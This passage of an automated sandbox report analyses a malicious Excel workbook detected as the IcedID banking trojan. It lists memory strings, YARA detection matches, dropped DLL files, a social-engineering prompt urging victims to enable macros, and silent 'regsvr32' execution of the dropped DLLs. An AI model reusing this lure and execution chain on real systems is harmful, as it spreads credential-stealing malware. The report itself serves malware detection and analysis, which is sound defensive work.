          Source: regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/pt/?nc1=h_ls
          Source: regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ru/
          Source: regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ru/?nc1=h_ls
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/search
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/search/
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/search/?searchQuery=
          Source: regsvr32.exe, 00000003.00000002.2103080337.0000000003680000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/terms/?nc1=f_pr
          Source: regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/th/
          Source: regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/th/?nc1=f_ls
          Source: regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tr/
          Source: regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tr/?nc1=h_ls
          Source: regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tw/
          Source: regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tw/?nc1=h_ls
          Source: regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/vi/
          Source: regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/vi/?nc1=f_ls
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/?nc2=h_m_mc
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/billing/home?nc2=h_m_bc
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/console/home
          Source: regsvr32.exe, 00000003.00000002.2103080337.0000000003680000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/console/home?nc1=f_ct&amp;src=footer-signin-mobile
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/iam/home?nc2=h_m_sc#security_credential
          Source: regsvr32.exe, 00000003.00000002.2103080337.0000000003680000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/support/home/?nc1=f_dr
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/support/home/?nc2=h_ql_cu
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/support/home?nc2=h_ql_cu
          Source: regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://d1.awsstatic.com
          Source: regsvr32.exe, 00000003.00000002.2103080337.0000000003680000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=3038&amp;fmt=gif
          Source: regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://devices.amazonaws.com?hp=tile&amp;so-exp=below
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://docs.aws.amazon.com/index.html?nc2=h_ql_doc
          Source: regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://fls-na.amazon.com/1/action-impressions/1/OE/aws-mktg/action/awsm_:comp_DeprecatedBrowser
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://i18n-string.us-west-2.prod.pricing.aws.a2z.com
          Source: regsvr32.exe, 00000003.00000002.2103080337.0000000003680000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com/communication-preferences?trk=homepage
          Source: regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com/fico-case-study.html?hp=tile&amp;story=fico
          Source: regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com/zillow-case-study?hp=tile&amp;story=zllw
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://phd.aws.amazon.com/?nc2=h_m_sc
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default&amp;sc_icampaign=
          Source: regsvr32.exe, 00000003.00000002.2103080337.0000000003680000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc1=f_ct&amp;src=default
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc2=h_ct&amp;src=default
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/manageYourAccount?nc2=h_m_ma
          Source: regsvr32.exe, 00000003.00000002.2103080337.0000000003680000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://press.aboutamazon.com/press-releases/aws
          Source: regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://s0.awsstatic.com
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/desktop/index.html
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/mobile/index.html
          Source: regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
          Source: regsvr32.exe, 00000003.00000002.2103080337.0000000003680000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/awscloud
          Source: regsvr32.exe, 00000003.00000002.2103080337.0000000003680000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://www.amazon.jobs/aws
          Source: regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom
          Source: regsvr32.exe, 00000003.00000002.2103080337.0000000003680000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://www.twitch.tv/aws
          Source: regsvr32.exe, 00000003.00000002.2103080337.0000000003680000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube.com/user/AmazonWebServices/Cloud/
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
          Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443

          E-Banking Fraud:

          barindex
          Yara detected IcedIDShow sources
          Source: Yara matchFile source: dump.pcap, type: PCAP
          Source: Yara matchFile source: 00000004.00000002.2106938981.00000000002EE000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2176, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2708, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3048, type: MEMORY

          System Summary:

          barindex
          Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
          Source: Document image extraction number: 0Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
          Source: Document image extraction number: 0Screenshot OCR: Enable Content button from the yellow bar above
          Source: Document image extraction number: 1Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
          Source: Document image extraction number: 1Screenshot OCR: Enable Content button from the yellow bar above
          Office process drops PE fileShow sources
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fmlJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lsdfik[1].fmlJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XRAY.dllJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XZIBIT.dllJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\lsdfik[1].fmlJump to dropped file
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00461678 NtQuerySystemInformation,3_2_00461678
          Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02091678 NtQuerySystemInformation,RtlAllocateHeap,4_2_02091678
          Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00201678 NtQuerySystemInformation,RtlAllocateHeap,6_2_00201678
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_004618103_2_00461810
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF8FB15D03_2_000007FEF8FB15D0
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF8FB41BF3_2_000007FEF8FB41BF
          Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_020918104_2_02091810
          Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000007FEF8F915D04_2_000007FEF8F915D0
          Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000007FEF8F941BF4_2_000007FEF8F941BF
          Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_002018106_2_00201810
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\lsdfik[1].fml 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lsdfik[1].fml 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
          Source: 3.2.regsvr32.exe.110000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
          Source: 4.2.regsvr32.exe.110000.0.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
          Source: 6.2.regsvr32.exe.120000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
          Source: 6.2.regsvr32.exe.200000.1.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
          Source: 3.2.regsvr32.exe.460000.1.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
          Source: 6.2.regsvr32.exe.120000.0.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
          Source: 4.2.regsvr32.exe.110000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
          Source: 4.2.regsvr32.exe.2090000.4.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
          Source: 3.2.regsvr32.exe.110000.0.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
          Source: 00000003.00000002.2099597118.0000000000110000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
          Source: 00000006.00000002.2114378210.0000000000120000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
          Source: 00000004.00000002.2106878534.0000000000110000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
          Source: regsvr32.exe, 00000003.00000002.2102606658.0000000003280000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSM@7/8@15/6
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Purchaseconfirmation-137606.xlsmJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD6AF.tmpJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XTOWN.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XZIBIT.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XTOWN.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XZIBIT.dllJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: Purchaseconfirmation-137606.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
          Source: Purchaseconfirmation-137606.xlsmInitial sample: OLE zip file path = xl/media/image1.png
          Source: Purchaseconfirmation-137606.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
          Source: Purchaseconfirmation-137606.xlsmInitial sample: OLE zip file path = xl/calcChain.xml
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: XRAY.dll.0.drStatic PE information: real checksum: 0x1baf8 should be: 0x19d85
          Source: lsdfik[1].fml.0.drStatic PE information: real checksum: 0x1baf8 should be: 0x19d85
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fmlJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lsdfik[1].fmlJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XRAY.dllJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XZIBIT.dllJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\lsdfik[1].fmlJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to dropped file
